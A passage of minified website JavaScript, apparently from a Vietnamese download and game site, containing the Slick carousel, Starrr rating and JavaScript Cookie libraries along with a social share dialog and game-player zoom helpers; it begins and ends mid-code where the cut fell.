t=this;n.target.tagName.match("TEXTAREA|INPUT|SELECT")||(37===n.keyCode&&!0===t.options.accessibility?t.changeSlide({data:{message:!0===t.options.rtl?"next":"previous"}}):39===n.keyCode&&!0===t.options.accessibility&&t.changeSlide({data:{message:!0===t.options.rtl?"previous":"next"}}))};t.prototype.lazyLoad=function(){function f(i){n("img[data-lazy]",i).each(function(){var i=n(this),r=n(this).attr("data-lazy"),f=n(this).attr("data-srcset"),e=n(this).attr("data-sizes")||t.$slider.attr("data-sizes"),u=document.createElement("img");u.onload=function(){i.animate({opacity:0},100,function(){f&&(i.attr("srcset",f),e&&i.attr("sizes",e));i.attr("src",r).animate({opacity:1},200,function(){i.removeAttr("data-lazy data-srcset data-sizes").removeClass("slick-loading")});t.$slider.trigger("lazyLoaded",[t,i,r])})};u.onerror=function(){i.removeAttr("data-lazy").removeClass("slick-loading").addClass("slick-lazyload-error");t.$slider.trigger("lazyLoadError",[t,i,r])};u.src=r})}var u,i,r,t=this;if(!0===t.options.centerMode?!0===t.options.infinite?r=(i=t.currentSlide+(t.options.slidesToShow/2+1))+t.options.slidesToShow+2:(i=Math.max(0,t.currentSlide-(t.options.slidesToShow/2+1)),r=t.options.slidesToShow/2+1+2+t.currentSlide):(i=t.options.infinite?t.options.slidesToShow+t.currentSlide:t.currentSlide,r=Math.ceil(i+t.options.slidesToShow),!0===t.options.fade&&(i>0&&i--,r<=t.slideCount&&r++)),u=t.$slider.find(".slick-slide").slice(i,r),"anticipated"===t.options.lazyLoad)for(var e=i-1,o=r,s=t.$slider.find(".slick-slide"),h=0;h<t.options.slidesToScroll;h++)e<0&&(e=t.slideCount-1),u=(u=u.add(s.eq(e))).add(s.eq(o)),e--,o++;f(u);t.slideCount<=t.options.slidesToShow?f(t.$slider.find(".slick-slide")):t.currentSlide>=t.slideCount-t.options.slidesToShow?f(t.$slider.find(".slick-cloned").slice(0,t.options.slidesToShow)):0===t.currentSlide&&f(t.$slider.find(".slick-cloned").slice(-1*t.options.slidesToShow))};t.prototype.loadSlider=function(){var n=this;n.setPosition();n.$slideTrack.css({opacity:1});n.$slider.removeClass("slick-loading");n.initUI();"progressive"===n.options.lazyLoad&&n.progressiveLazyLoad()};t.prototype.next=t.prototype.slickNext=function(){this.changeSlide({data:{message:"next"}})};t.prototype.orientationChange=function(){var n=this;n.checkResponsive();n.setPosition()};t.prototype.pause=t.prototype.slickPause=function(){var n=this;n.autoPlayClear();n.paused=!0};t.prototype.play=t.prototype.slickPlay=function(){var n=this;n.autoPlay();n.options.autoplay=!0;n.paused=!1;n.focussed=!1;n.interrupted=!1};t.prototype.postSlide=function(t){var i=this;i.unslicked||(i.$slider.trigger("afterChange",[i,t]),i.animating=!1,i.slideCount>i.options.slidesToShow&&i.setPosition(),i.swipeLeft=null,i.options.autoplay&&i.autoPlay(),!0===i.options.accessibility&&(i.initADA(),i.options.focusOnChange&&n(i.$slides.get(i.currentSlide)).attr("tabindex",0).focus()))};t.prototype.prev=t.prototype.slickPrev=function(){this.changeSlide({data:{message:"previous"}})};t.prototype.preventDefault=function(n){n.preventDefault()};t.prototype.progressiveLazyLoad=function(t){t=t||1;var r,u,f,e,o,i=this,s=n("img[data-lazy]",i.$slider);s.length?(r=s.first(),u=r.attr("data-lazy"),f=r.attr("data-srcset"),e=r.attr("data-sizes")||i.$slider.attr("data-sizes"),(o=document.createElement("img")).onload=function(){f&&(r.attr("srcset",f),e&&r.attr("sizes",e));r.attr("src",u).removeAttr("data-lazy data-srcset data-sizes").removeClass("slick-loading");!0===i.options.adaptiveHeight&&i.setPosition();i.$slider.trigger("lazyLoaded",[i,r,u]);i.progressiveLazyLoad()},o.onerror=function(){t<3?setTimeout(function(){i.progressiveLazyLoad(t+1)},500):(r.removeAttr("data-lazy").removeClass("slick-loading").addClass("slick-lazyload-error"),i.$slider.trigger("lazyLoadError",[i,r,u]),i.progressiveLazyLoad())},o.src=u):i.$slider.trigger("allImagesLoaded",[i])};t.prototype.refresh=function(t){var r,u,i=this;u=i.slideCount-i.options.slidesToShow;!i.options.infinite&&i.currentSlide>u&&(i.currentSlide=u);i.slideCount<=i.options.slidesToShow&&(i.currentSlide=0);r=i.currentSlide;i.destroy(!0);n.extend(i,i.initials,{currentSlide:r});i.init();t||i.changeSlide({data:{message:"index",index:r}},!1)};t.prototype.registerBreakpoints=function(){var u,f,i,t=this,r=t.options.responsive||null;if("array"===n.type(r)&&r.length){t.respondTo=t.options.respondTo||"window";for(u in r)if(i=t.breakpoints.length-1,r.hasOwnProperty(u)){for(f=r[u].breakpoint;i>=0;)t.breakpoints[i]&&t.breakpoints[i]===f&&t.breakpoints.splice(i,1),i--;t.breakpoints.push(f);t.breakpointSettings[f]=r[u].settings}t.breakpoints.sort(function(n,i){return t.options.mobileFirst?n-i:i-n})}};t.prototype.reinit=function(){var t=this;t.$slides=t.$slideTrack.children(t.options.slide).addClass("slick-slide");t.slideCount=t.$slides.length;t.currentSlide>=t.slideCount&&0!==t.currentSlide&&(t.currentSlide=t.currentSlide-t.options.slidesToScroll);t.slideCount<=t.options.slidesToShow&&(t.currentSlide=0);t.registerBreakpoints();t.setProps();t.setupInfinite();t.buildArrows();t.updateArrows();t.initArrowEvents();t.buildDots();t.updateDots();t.initDotEvents();t.cleanUpSlideEvents();t.initSlideEvents();t.checkResponsive(!1,!0);!0===t.options.focusOnSelect&&n(t.$slideTrack).children().on("click.slick",t.selectHandler);t.setSlideClasses("number"==typeof t.currentSlide?t.currentSlide:0);t.setPosition();t.focusHandler();t.paused=!t.options.autoplay;t.autoPlay();t.$slider.trigger("reInit",[t])};t.prototype.resize=function(){var t=this;n(window).width()!==t.windowWidth&&(clearTimeout(t.windowDelay),t.windowDelay=window.setTimeout(function(){t.windowWidth=n(window).width();t.checkResponsive();t.unslicked||t.setPosition()},50))};t.prototype.removeSlide=t.prototype.slickRemove=function(n,t,i){var r=this;if(n="boolean"==typeof n?!0===(t=n)?0:r.slideCount-1:!0===t?--n:n,r.slideCount<1||n<0||n>r.slideCount-1)return!1;r.unload();!0===i?r.$slideTrack.children().remove():r.$slideTrack.children(this.options.slide).eq(n).remove();r.$slides=r.$slideTrack.children(this.options.slide);r.$slideTrack.children(this.options.slide).detach();r.$slideTrack.append(r.$slides);r.$slidesCache=r.$slides;r.reinit()};t.prototype.setCSS=function(n){var r,u,t=this,i={};!0===t.options.rtl&&(n=-n);r="left"==t.positionProp?Math.ceil(n)+"px":"0px";u="top"==t.positionProp?Math.ceil(n)+"px":"0px";i[t.positionProp]=n;!1===t.transformsEnabled?t.$slideTrack.css(i):(i={},!1===t.cssTransitions?(i[t.animType]="translate("+r+", "+u+")",t.$slideTrack.css(i)):(i[t.animType]="translate3d("+r+", "+u+", 0px)",t.$slideTrack.css(i)))};t.prototype.setDimensions=function(){var n=this,t;!1===n.options.vertical?!0===n.options.centerMode&&n.$list.css({padding:"0px "+n.options.centerPadding}):(n.$list.height(n.$slides.first().outerHeight(!0)*n.options.slidesToShow),!0===n.options.centerMode&&n.$list.css({padding:n.options.centerPadding+" 0px"}));n.listWidth=n.$list.width();n.listHeight=n.$list.height();!1===n.options.vertical&&!1===n.options.variableWidth?(n.slideWidth=Math.ceil(n.listWidth/n.options.slidesToShow),n.$slideTrack.width(Math.ceil(n.slideWidth*n.$slideTrack.children(".slick-slide").length))):!0===n.options.variableWidth?n.$slideTrack.width(5e3*n.slideCount):(n.slideWidth=Math.ceil(n.listWidth),n.$slideTrack.height(Math.ceil(n.$slides.first().outerHeight(!0)*n.$slideTrack.children(".slick-slide").length)));t=n.$slides.first().outerWidth(!0)-n.$slides.first().width();!1===n.options.variableWidth&&n.$slideTrack.children(".slick-slide").width(n.slideWidth-t)};t.prototype.setFade=function(){var i,t=this;t.$slides.each(function(r,u){i=t.slideWidth*r*-1;!0===t.options.rtl?n(u).css({position:"relative",right:i,top:0,zIndex:t.options.zIndex-2,opacity:0}):n(u).css({position:"relative",left:i,top:0,zIndex:t.options.zIndex-2,opacity:0})});t.$slides.eq(t.currentSlide).css({zIndex:t.options.zIndex-1,opacity:1})};t.prototype.setHeight=function(){var n=this,t;1===n.options.slidesToShow&&!0===n.options.adaptiveHeight&&!1===n.options.vertical&&(t=n.$slides.eq(n.currentSlide).outerHeight(!0),n.$list.css("height",t))};t.prototype.setOption=t.prototype.slickSetOption=function(){var u,f,e,i,r,t=this,o=!1;if("object"===n.type(arguments[0])?(e=arguments[0],o=arguments[1],r="multiple"):"string"===n.type(arguments[0])&&(e=arguments[0],i=arguments[1],o=arguments[2],"responsive"===arguments[0]&&"array"===n.type(arguments[1])?r="responsive":void 0!==arguments[1]&&(r="single")),"single"===r)t.options[e]=i;else if("multiple"===r)n.each(e,function(n,i){t.options[n]=i});else if("responsive"===r)for(f in i)if("array"!==n.type(t.options.responsive))t.options.responsive=[i[f]];else{for(u=t.options.responsive.length-1;u>=0;)t.options.responsive[u].breakpoint===i[f].breakpoint&&t.options.responsive.splice(u,1),u--;t.options.responsive.push(i[f])}o&&(t.unload(),t.reinit())};t.prototype.setPosition=function(){var n=this;n.setDimensions();n.setHeight();!1===n.options.fade?n.setCSS(n.getLeft(n.currentSlide)):n.setFade();n.$slider.trigger("setPosition",[n])};t.prototype.setProps=function(){var n=this,t=document.body.style;n.positionProp=!0===n.options.vertical?"top":"left";"top"===n.positionProp?n.$slider.addClass("slick-vertical"):n.$slider.removeClass("slick-vertical");void 0===t.WebkitTransition&&void 0===t.MozTransition&&void 0===t.msTransition||!0===n.options.useCSS&&(n.cssTransitions=!0);n.options.fade&&("number"==typeof n.options.zIndex?n.options.zIndex<3&&(n.options.zIndex=3):n.options.zIndex=n.defaults.zIndex);void 0!==t.OTransform&&(n.animType="OTransform",n.transformType="-o-transform",n.transitionType="OTransition",void 0===t.perspectiveProperty&&void 0===t.webkitPerspective&&(n.animType=!1));void 0!==t.MozTransform&&(n.animType="MozTransform",n.transformType="-moz-transform",n.transitionType="MozTransition",void 0===t.perspectiveProperty&&void 0===t.MozPerspective&&(n.animType=!1));void 0!==t.webkitTransform&&(n.animType="webkitTransform",n.transformType="-webkit-transform",n.transitionType="webkitTransition",void 0===t.perspectiveProperty&&void 0===t.webkitPerspective&&(n.animType=!1));void 0!==t.msTransform&&(n.animType="msTransform",n.transformType="-ms-transform",n.transitionType="msTransition",void 0===t.msTransform&&(n.animType=!1));void 0!==t.transform&&!1!==n.animType&&(n.animType="transform",n.transformType="transform",n.transitionType="transition");n.transformsEnabled=n.options.useTransform&&null!==n.animType&&!1!==n.animType};t.prototype.setSlideClasses=function(n){var u,i,r,f,t=this,e;(i=t.$slider.find(".slick-slide").removeClass("slick-active slick-center slick-current").attr("aria-hidden","true"),t.$slides.eq(n).addClass("slick-current"),!0===t.options.centerMode)?(e=t.options.slidesToShow%2==0?1:0,u=Math.floor(t.options.slidesToShow/2),!0===t.options.infinite&&(n>=u&&n<=t.slideCount-1-u?t.$slides.slice(n-u+e,n+u+1).addClass("slick-active").attr("aria-hidden","false"):(r=t.options.slidesToShow+n,i.slice(r-u+1+e,r+u+2).addClass("slick-active").attr("aria-hidden","false")),0===n?i.eq(i.length-1-t.options.slidesToShow).addClass("slick-center"):n===t.slideCount-1&&i.eq(t.options.slidesToShow).addClass("slick-center")),t.$slides.eq(n).addClass("slick-center")):n>=0&&n<=t.slideCount-t.options.slidesToShow?t.$slides.slice(n,n+t.options.slidesToShow).addClass("slick-active").attr("aria-hidden","false"):i.length<=t.options.slidesToShow?i.addClass("slick-active").attr("aria-hidden","false"):(f=t.slideCount%t.options.slidesToShow,r=!0===t.options.infinite?t.options.slidesToShow+n:n,t.options.slidesToShow==t.options.slidesToScroll&&t.slideCount-n<t.options.slidesToShow?i.slice(r-(t.options.slidesToShow-f),r+f).addClass("slick-active").attr("aria-hidden","false"):i.slice(r,r+t.options.slidesToShow).addClass("slick-active").attr("aria-hidden","false"));"ondemand"!==t.options.lazyLoad&&"anticipated"!==t.options.lazyLoad||t.lazyLoad()};t.prototype.setupInfinite=function(){var i,r,u,t=this;if(!0===t.options.fade&&(t.options.centerMode=!1),!0===t.options.infinite&&!1===t.options.fade&&(r=null,t.slideCount>t.options.slidesToShow)){for(u=!0===t.options.centerMode?t.options.slidesToShow+1:t.options.slidesToShow,i=t.slideCount;i>t.slideCount-u;i-=1)r=i-1,n(t.$slides[r]).clone(!0).attr("id","").attr("data-slick-index",r-t.slideCount).prependTo(t.$slideTrack).addClass("slick-cloned");for(i=0;i<u+t.slideCount;i+=1)r=i,n(t.$slides[r]).clone(!0).attr("id","").attr("data-slick-index",r+t.slideCount).appendTo(t.$slideTrack).addClass("slick-cloned");t.$slideTrack.find(".slick-cloned").find("[id]").each(function(){n(this).attr("id","")})}};t.prototype.interrupt=function(n){var t=this;n||t.autoPlay();t.interrupted=n};t.prototype.selectHandler=function(t){var i=this,u=n(t.target).is(".slick-slide")?n(t.target):n(t.target).parents(".slick-slide"),r=parseInt(u.attr("data-slick-index"));r||(r=0);i.slideCount<=i.options.slidesToShow?i.slideHandler(r,!1,!0):i.slideHandler(r)};t.prototype.slideHandler=function(n,t,i){var u,f,s,e,o,h=null,r=this;if(t=t||!1,!(!0===r.animating&&!0===r.options.waitForAnimate||!0===r.options.fade&&r.currentSlide===n))if(!1===t&&r.asNavFor(n),u=n,h=r.getLeft(u),e=r.getLeft(r.currentSlide),r.currentLeft=null===r.swipeLeft?e:r.swipeLeft,!1===r.options.infinite&&!1===r.options.centerMode&&(n<0||n>r.getDotCount()*r.options.slidesToScroll))!1===r.options.fade&&(u=r.currentSlide,!0!==i?r.animateSlide(e,function(){r.postSlide(u)}):r.postSlide(u));else if(!1===r.options.infinite&&!0===r.options.centerMode&&(n<0||n>r.slideCount-r.options.slidesToScroll))!1===r.options.fade&&(u=r.currentSlide,!0!==i?r.animateSlide(e,function(){r.postSlide(u)}):r.postSlide(u));else{if(r.options.autoplay&&clearInterval(r.autoPlayTimer),f=u<0?r.slideCount%r.options.slidesToScroll!=0?r.slideCount-r.slideCount%r.options.slidesToScroll:r.slideCount+u:u>=r.slideCount?r.slideCount%r.options.slidesToScroll!=0?0:u-r.slideCount:u,r.animating=!0,r.$slider.trigger("beforeChange",[r,r.currentSlide,f]),s=r.currentSlide,r.currentSlide=f,r.setSlideClasses(r.currentSlide),r.options.asNavFor&&(o=(o=r.getNavTarget()).slick("getSlick")).slideCount<=o.options.slidesToShow&&o.setSlideClasses(r.currentSlide),r.updateDots(),r.updateArrows(),!0===r.options.fade)return!0!==i?(r.fadeSlideOut(s),r.fadeSlide(f,function(){r.postSlide(f)})):r.postSlide(f),void r.animateHeight();!0!==i?r.animateSlide(h,function(){r.postSlide(f)}):r.postSlide(f)}};t.prototype.startLoad=function(){var n=this;!0===n.options.arrows&&n.slideCount>n.options.slidesToShow&&(n.$prevArrow.hide(),n.$nextArrow.hide());!0===n.options.dots&&n.slideCount>n.options.slidesToShow&&n.$dots.hide();n.$slider.addClass("slick-loading")};t.prototype.swipeDirection=function(){var i,r,u,n,t=this;return i=t.touchObject.startX-t.touchObject.curX,r=t.touchObject.startY-t.touchObject.curY,u=Math.atan2(r,i),(n=Math.round(180*u/Math.PI))<0&&(n=360-Math.abs(n)),n<=45&&n>=0?!1===t.options.rtl?"left":"right":n<=360&&n>=315?!1===t.options.rtl?"left":"right":n>=135&&n<=225?!1===t.options.rtl?"right":"left":!0===t.options.verticalSwiping?n>=35&&n<=135?"down":"up":"vertical"};t.prototype.swipeEnd=function(){var t,i,n=this;if(n.dragging=!1,n.swiping=!1,n.scrolling)return n.scrolling=!1,!1;if(n.interrupted=!1,n.shouldClick=!(n.touchObject.swipeLength>10),void 0===n.touchObject.curX)return!1;if(!0===n.touchObject.edgeHit&&n.$slider.trigger("edge",[n,n.swipeDirection()]),n.touchObject.swipeLength>=n.touchObject.minSwipe){switch(i=n.swipeDirection()){case"left":case"down":t=n.options.swipeToSlide?n.checkNavigable(n.currentSlide+n.getSlideCount()):n.currentSlide+n.getSlideCount();n.currentDirection=0;break;case"right":case"up":t=n.options.swipeToSlide?n.checkNavigable(n.currentSlide-n.getSlideCount()):n.currentSlide-n.getSlideCount();n.currentDirection=1}"vertical"!=i&&(n.slideHandler(t),n.touchObject={},n.$slider.trigger("swipe",[n,i]))}else n.touchObject.startX!==n.touchObject.curX&&(n.slideHandler(n.currentSlide),n.touchObject={})};t.prototype.swipeHandler=function(n){var t=this;if(!(!1===t.options.swipe||"ontouchend"in document&&!1===t.options.swipe||!1===t.options.draggable&&-1!==n.type.indexOf("mouse")))switch(t.touchObject.fingerCount=n.originalEvent&&void 0!==n.originalEvent.touches?n.originalEvent.touches.length:1,t.touchObject.minSwipe=t.listWidth/t.options.touchThreshold,!0===t.options.verticalSwiping&&(t.touchObject.minSwipe=t.listHeight/t.options.touchThreshold),n.data.action){case"start":t.swipeStart(n);break;case"move":t.swipeMove(n);break;case"end":t.swipeEnd(n)}};t.prototype.swipeMove=function(n){var f,e,r,u,i,o,t=this;return i=void 0!==n.originalEvent?n.originalEvent.touches:null,!(!t.dragging||t.scrolling||i&&1!==i.length)&&(f=t.getLeft(t.currentSlide),t.touchObject.curX=void 0!==i?i[0].pageX:n.clientX,t.touchObject.curY=void 0!==i?i[0].pageY:n.clientY,t.touchObject.swipeLength=Math.round(Math.sqrt(Math.pow(t.touchObject.curX-t.touchObject.startX,2))),o=Math.round(Math.sqrt(Math.pow(t.touchObject.curY-t.touchObject.startY,2))),!t.options.verticalSwiping&&!t.swiping&&o>4?(t.scrolling=!0,!1):(!0===t.options.verticalSwiping&&(t.touchObject.swipeLength=o),e=t.swipeDirection(),void 0!==n.originalEvent&&t.touchObject.swipeLength>4&&(t.swiping=!0,n.preventDefault()),u=(!1===t.options.rtl?1:-1)*(t.touchObject.curX>t.touchObject.startX?1:-1),!0===t.options.verticalSwiping&&(u=t.touchObject.curY>t.touchObject.startY?1:-1),r=t.touchObject.swipeLength,t.touchObject.edgeHit=!1,!1===t.options.infinite&&(0===t.currentSlide&&"right"===e||t.currentSlide>=t.getDotCount()&&"left"===e)&&(r=t.touchObject.swipeLength*t.options.edgeFriction,t.touchObject.edgeHit=!0),t.swipeLeft=!1===t.options.vertical?f+r*u:f+r*(t.$list.height()/t.listWidth)*u,!0===t.options.verticalSwiping&&(t.swipeLeft=f+r*u),!0!==t.options.fade&&!1!==t.options.touchMove&&(!0===t.animating?(t.swipeLeft=null,!1):void t.setCSS(t.swipeLeft))))};t.prototype.swipeStart=function(n){var i,t=this;if(t.interrupted=!0,1!==t.touchObject.fingerCount||t.slideCount<=t.options.slidesToShow)return t.touchObject={},!1;void 0!==n.originalEvent&&void 0!==n.originalEvent.touches&&(i=n.originalEvent.touches[0]);t.touchObject.startX=t.touchObject.curX=void 0!==i?i.pageX:n.clientX;t.touchObject.startY=t.touchObject.curY=void 0!==i?i.pageY:n.clientY;t.dragging=!0};t.prototype.unfilterSlides=t.prototype.slickUnfilter=function(){var n=this;null!==n.$slidesCache&&(n.unload(),n.$slideTrack.children(this.options.slide).detach(),n.$slidesCache.appendTo(n.$slideTrack),n.reinit())};t.prototype.unload=function(){var t=this;n(".slick-cloned",t.$slider).remove();t.$dots&&t.$dots.remove();t.$prevArrow&&t.htmlExpr.test(t.options.prevArrow)&&t.$prevArrow.remove();t.$nextArrow&&t.htmlExpr.test(t.options.nextArrow)&&t.$nextArrow.remove();t.$slides.removeClass("slick-slide slick-active slick-visible slick-current").attr("aria-hidden","true").css("width","")};t.prototype.unslick=function(n){var t=this;t.$slider.trigger("unslick",[t,n]);t.destroy()};t.prototype.updateArrows=function(){var n=this;Math.floor(n.options.slidesToShow/2);!0===n.options.arrows&&n.slideCount>n.options.slidesToShow&&!n.options.infinite&&(n.$prevArrow.removeClass("slick-disabled").attr("aria-disabled","false"),n.$nextArrow.removeClass("slick-disabled").attr("aria-disabled","false"),0===n.currentSlide?(n.$prevArrow.addClass("slick-disabled").attr("aria-disabled","true"),n.$nextArrow.removeClass("slick-disabled").attr("aria-disabled","false")):n.currentSlide>=n.slideCount-n.options.slidesToShow&&!1===n.options.centerMode?(n.$nextArrow.addClass("slick-disabled").attr("aria-disabled","true"),n.$prevArrow.removeClass("slick-disabled").attr("aria-disabled","false")):n.currentSlide>=n.slideCount-1&&!0===n.options.centerMode&&(n.$nextArrow.addClass("slick-disabled").attr("aria-disabled","true"),n.$prevArrow.removeClass("slick-disabled").attr("aria-disabled","false")))};t.prototype.updateDots=function(){var n=this;null!==n.$dots&&(n.$dots.find("li").removeClass("slick-active").end(),n.$dots.find("li").eq(Math.floor(n.currentSlide/n.options.slidesToScroll)).addClass("slick-active"))};t.prototype.visibility=function(){var n=this;n.options.autoplay&&(n.interrupted=document[n.hidden]?!0:!1)};n.fn.slick=function(){for(var u,i=this,r=arguments[0],f=Array.prototype.slice.call(arguments,1),e=i.length,n=0;n<e;n++)if("object"==typeof r||void 0===r?i[n].slick=new t(i[n],r):u=i[n].slick[r].apply(i[n].slick,f),void 0!==u)return u;return i}});slice=[].slice,function(n,t){var i;return t.Starrr=i=function(){function t(t,i){if(this.options=n.extend({},this.defaults,i),this.$el=t,this.createStars(),this.syncRating(),!this.options.readOnly){this.$el.on("mouseover.starrr","a",function(n){return function(t){return n.syncRating(n.getStars().index(t.currentTarget)+1)}}(this));this.$el.on("mouseout.starrr",function(n){return function(){return n.syncRating()}}(this));this.$el.on("click.starrr","a",function(n){return function(t){return t.preventDefault(),n.setRating(n.getStars().index(t.currentTarget)+1)}}(this));this.$el.on("starrr:change",this.options.change)}}return t.prototype.defaults={rating:void 0,max:5,readOnly:!1,emptyClass:"fa fa-star-o",fullClass:"fa fa-star",change:function(){}},t.prototype.getStars=function(){return this.$el.find("a")},t.prototype.createStars=function(){var n,t,i;for(i=[],n=1,t=this.options.max;1<=t?n<=t:n>=t;1<=t?n++:n--)i.push(this.$el.append("<a href='#' />"));return i},t.prototype.setRating=function(n){return this.options.rating===n&&(n=void 0),this.options.rating=n,this.syncRating(),this.$el.trigger("starrr:change",n)},t.prototype.getRating=function(){return this.options.rating},t.prototype.syncRating=function(n){var f,t,i,r,u;for(n||(n=this.options.rating),f=this.getStars(),u=[],t=i=1,r=this.options.max;1<=r?i<=r:i>=r;t=1<=r?++i:--i)u.push(f.eq(t-1).removeClass(n>=t?this.options.emptyClass:this.options.fullClass).addClass(n>=t?this.options.fullClass:this.options.emptyClass));return u},t}(),n.fn.extend({starrr:function(){var r,t;return t=arguments[0],r=2<=arguments.length?slice.call(arguments,1):[],this.each(function(){var u;return u=n(this).data("starrr"),u||n(this).data("starrr",u=new i(n(this),t)),typeof t=="string"?u[t].apply(u,r):void 0})}})}(window.jQuery,window); /*! * JavaScript Cookie v2.2.0 * https://github.com/js-cookie/js-cookie * * Copyright 2006, 2015 Klaus Hartl & Fagner Brack * Released under the MIT license */ (function(n){var t=!1,r,i;typeof define=="function"&&define.amd&&(define(n),t=!0);typeof exports=="object"&&(module.exports=n(),t=!0);t||(r=window.Cookies,i=window.Cookies=n(),i.noConflict=function(){return window.Cookies=r,i})})(function(){function n(){for(var n=0,r={},t,i;n<arguments.length;n++){t=arguments[n];for(i in t)r[i]=t[i]}return r}function t(i){function r(t,u,f){var o,c,l,s,v,e,h;if(typeof document!="undefined"){if(arguments.length>1){f=n({path:"/"},r.defaults,f);typeof f.expires=="number"&&(c=new Date,c.setMilliseconds(c.getMilliseconds()+f.expires*864e5),f.expires=c);f.expires=f.expires?f.expires.toUTCString():"";try{o=JSON.stringify(u);/^[\{\[]/.test(o)&&(u=o)}catch(w){}u=i.write?i.write(u,t):encodeURIComponent(String(u)).replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g,decodeURIComponent);t=encodeURIComponent(String(t));t=t.replace(/%(23|24|26|2B|5E|60|7C)/g,decodeURIComponent);t=t.replace(/[\(\)]/g,escape);l="";for(s in f)f[s]&&(l+="; "+s,f[s]!==!0)&&(l+="="+f[s]);return document.cookie=t+"="+u+l}t||(o={});for(var y=document.cookie?document.cookie.split("; "):[],p=/(%[0-9A-Z]{2})+/g,a=0;a<y.length;a++){v=y[a].split("=");e=v.slice(1).join("=");this.json||e.charAt(0)!=='"'||(e=e.slice(1,-1));try{if(h=v[0].replace(p,decodeURIComponent),e=i.read?i.read(e,h):i(e,h)||e.replace(p,decodeURIComponent),this.json)try{e=JSON.parse(e)}catch(w){}if(t===h){o=e;break}t||(o[h]=e)}catch(w){}}return o}}return r.set=r,r.get=function(n){return r.call(r,n)},r.getJSON=function(){return r.apply({json:!0},[].slice.call(arguments))},r.defaults={},r.remove=function(t,i){r(t,"",n(i,{expires:-1}))},r.withConverter=t,r}return t(function(){})});$(function(){if($(".sharebox .more-share,.sharebox .zalo-share, .sharebox .twitter-share,.sharebox .fb-share").length!=0){var i="579745863508352884",n=$("body"),r=$("link[rel=canonical]").attr("href"),t=typeof r=="string"?r:location.protocol+"//"+location.hostname+location.pathname,u="",f="";/android|webos|iphone|ipad|ipod|blackberry|iemobile|opera mini/i.test(navigator.userAgent)?$(".sharebox .qrcode-share").addClass("hide"):(u='<div id="qrcode" class="hide" ><center><img alt="Mã QR Code" src="https://chart.apis.google.com/chart?cht=qr&amp;chs=100x100&amp;chld=L|0&amp;chl='+encodeURIComponent(t+(t.indexOf("?")>0?"&":"?")+"utm_source=desktop&utm_medium=qrcode&utm_campaign=share")+'"/><\/center><p>Bạn có thể dùng ứng dụng đọc <a href="//tip.down.vn/huong-dan-su-dung-qr-code-tren-dien-thoai-150" target="_blank">QR Code<\/a> trên điện thoại để mở đường dẫn này<br><a href="//tip.down.vn/huong-dan-su-dung-qr-code-tren-dien-thoai-150" target="_blank">Xem hướng dẫn tại đây<\/a>.<\/p><\/div>',f='<a class="qrcode-share" title="Sử dụng ứng dụng quét QR Code để mở trên điện thoại"><span class="icon-share icon-qrcode"><\/span><i>Quét bằng QR Code<\/i><\/a>');var e=$("<div class='overlay-share'><\/div>").appendTo("body"),o=$("<div class='toggle-share' title='Chia sẻ'><\/div>").appendTo("body"),s=$('<div class="dialog-share"><div class="share-title">Chia sẻ<\/div><a class="fb-share" title="Chia sẻ Facebook"><span class="icon-share icon-fb"><\/span><i>Chia sẻ Facebook<\/i><\/a><a class="zalo-share zalo-share-button" title="Chia sẻ Zalo"><span class="icon-share icon-zalo "><\/span><i>Chia sẻ Zalo<\/i><\/a><a class="twitter-share" title="Chia sẻ qua Twitter"><span class="icon-share icon-twitter"><\/span><i>Chia sẻ Twitter<\/i><\/a>'+f+""+u+'<div class="close-box-share">Đóng<\/div><\/div>').appendTo("body");if($(".more-share , .toggle-share").click(function(){n.toggleClass("share")}),$(".overlay-share , .close-box-share").click(function(){n.removeClass("share")}),$(".zalo-share").attr("data-href",t).attr("data-oaid",i).attr("data-layout","icon-text").attr("data-customize","true").addClass("zalo-share-button").click(function(){var u=window.btoa(JSON.stringify({url:t})),r="https://sp.zalo.me/share?v=2&oa="+i+"&d="+encodeURIComponent(u);r="https://id.zalo.me/account?continue="+encodeURIComponent(r);window.open(r);n.removeClass("share")}),$(".sharebox>.qrcode-share").click(function(){n.addClass("share");$(".dialog-share #qrcode").removeClass("hide")}),$(".dialog-share .qrcode-share").click(function(){$(".dialog-share #qrcode").toggleClass("hide")}),$(".fb-share").click(function(){window.open("https://www.facebook.com/sharer/sharer.php?u="+encodeURIComponent(t));n.removeClass("share")}),$(".twitter-share").click(function(){window.open("http://twitter.com/intent/tweet?url="+encodeURIComponent(t)+"&text="+encodeURIComponent(document.title));n.removeClass("share")}),typeof ga=="function")$(".zalo-share,.fb-share, .twitter-share").on("click",function(){var n=$(this);ga("send","event","Share",n.attr("class"),location.href)})}});gamebox={value:0,advertisingseconds:15,osize:null,zoom:function(n,t){n<=-1?n=-1:n>=1&&(n=1);var f=$("#gameplayer"),r="",i=gamebox.osize.width,u=0;gamebox.value=n;switch(n){case-1:r="tiny";i=480;u=Math.floor(i*this.osize.height/this.osize.width);f.removeClass("small medium zoomfit").addClass(r);break;case 0:r="small";i=640;u=Math.floor(i*this.osize.height/this.osize.width);f.removeClass("tiny medium zoomfit").addClass(r);break;case 1:r="medium";i=960;u=Math.floor(i*this.osize.height/this.osize.width);f.removeClass("small tiny zoomfit").addClass(r)}t==!0?($("#playbox").width(gamebox.osize.width),$("#playbox").height(gamebox.osize.height)):($("#playbox").width(i),$("#playbox").height(u))},getSize:function(n,t,i,r){var f=0,e=0,u=i/n;return u>r/t&&(u=r/t),f=u*n,e=u*t,{width:f,height:e}},zoomfit:function(){var i=gamebox.osize.width,r=gamebox.osize.height,u=$("#gamebox").width(),f=$(window).height(),n=gamebox.getSize(i,r,u,f),t=$("#gameplayer");t.removeClass("small tiny medium").toggleClass("zoomGame");t.hasClass("zoomGame")?(n.width>$("#gameplayer").width()&&$("#gameview").addClass("zoom-hide"),$("#zoomfit").attr("title","Kích thước ban đầu"),$("#playbox").width(n.width),$("#playbox").height(n.height),gamebox.value=1,gamebox.scrollTo($("#playbox").offset().top)):(gamebox.resetzoom(),$("#zoomfit").attr("title","Vừa màn hình"),$("#gameview").removeClass("zoom-hide"))},full:function(){var r=$("#gameplayer");r.addClass("full");var n=gamebox.osize.width,t=gamebox.osize.height,u=screen.width,f=screen.height,e=$("#controls").attr("data-resizeable"),i=gamebox.getSize(n,t,u,f);e=="2"?($("#playbox").width(n),$("#playbox").height(t)):($("#playbox").width(i.width),$("#playbox").height(i.height));gamebox.scrollTo($("#playbox").offset().top)},resetzoom:function(){var 